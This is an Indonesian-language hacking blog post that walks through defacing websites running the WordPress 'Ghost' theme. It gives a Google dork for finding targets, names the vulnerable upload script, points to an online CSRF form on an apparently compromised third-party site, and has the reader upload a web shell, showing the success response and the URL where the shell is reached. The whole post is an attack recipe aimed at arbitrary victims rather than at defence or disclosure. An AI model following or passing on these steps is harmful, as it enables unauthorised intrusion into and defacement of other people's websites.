Deface Metode WordPress Themes Ghost



###############################################################

#Title: Deface Metode WordPress Themes Ghost                                           
#Author: ./M4RY_PR0S4                                                                               
#Tested on : Windows 7                                                                                 
#Google Dork: inurl:/wp-content/themes/Ghost/                                                        
#Exploit : /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php 

###################################################################

#Steps 1 : Dorking : inurl:/wp-content/themes/Ghost/    
               Pilih salah satu target 

#Steps 2: Exploit dengan: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Ciri ciri vuln biasanya ada error nya " {"status":"NOK", "ERR":"This file is incorect"} " nah kek gitu

Kemudia langsung ke CSRF Online nya di -> http://www.diaperbabies123.com/wp-admin/csrf.php

Steps 3: Masukkan link target ke csrf , contoh : www.site.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Trus Post File dengan Filedata kemudian Shutdown PC -_- , ya Lock target lah

Upload Shell kesayangan kalian , jika succes upload shell biasanya kek gini

{"status":"OK","imageID":"yourshell.php","imageName":"yourshell.php","php":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tyourshell.php
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}

Untuk acces shell kalian di www.site.com/wp-content/uploads/settingsimages/yourshell.php

Sekian tutor dari w >:( maap klo kurang jelas hehe , Copas sertakan Sumber :3

Security Ghost All Member - ./M4RY_PR0S4

             
Previous
Next Post »
Thanks for your comment